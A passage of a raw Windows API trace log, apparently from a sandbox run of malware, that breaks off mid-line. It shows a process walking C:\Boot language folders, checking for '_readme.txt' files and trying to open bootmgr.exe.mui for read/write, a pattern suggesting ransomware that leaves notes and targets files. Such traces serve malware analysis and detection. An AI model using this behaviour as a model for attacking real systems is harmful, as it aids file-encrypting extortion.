0x75f80000 [0146.796] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.796] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.796] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.796] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.796] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.796] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.796] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.796] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.796] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.796] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.796] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.796] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.796] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.796] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x81c) returned 0x328ec10 [0146.797] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0146.797] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.797] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.797] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0146.797] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.797] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.797] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.797] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.797] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.797] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.797] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.797] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.797] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.797] PathFindExtensionW (pszPath="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned=".mui" [0146.797] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.797] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.797] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebb7f70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.797] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.797] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.797] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.797] PathFindExtensionW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned=".txt" [0146.797] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.797] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebb7f70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.798] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.798] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.798] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ca8 | out: hHeap=0x6e0000) returned 1 [0146.798] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.798] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.798] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.798] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.798] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.798] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.798] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.798] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.798] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.798] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.798] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.798] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.798] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.798] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.798] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.798] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.798] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.798] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.799] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.799] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.800] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.800] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.800] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.800] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.800] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.800] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.800] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.800] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.800] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.800] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.800] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.800] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.800] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.800] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.800] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.800] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.800] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.800] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.800] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0146.801] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.801] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.801] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.801] PathFindFileNameW (pszPath="") returned="" [0146.801] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.801] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.801] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.801] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.801] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.801] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.801] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.801] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0146.801] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0146.801] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.801] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.802] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.802] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.802] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.802] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned=".mui" [0146.802] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.802] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.802] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebde0d0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.802] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned=".txt" [0146.802] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.802] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebde0d0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.802] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.802] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.802] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ca8 | out: hHeap=0x6e0000) returned 1 [0146.802] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.802] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.802] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.802] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.802] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.802] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.802] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.802] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.802] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.802] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.802] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.802] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.803] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.803] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.803] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.803] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.803] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.803] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 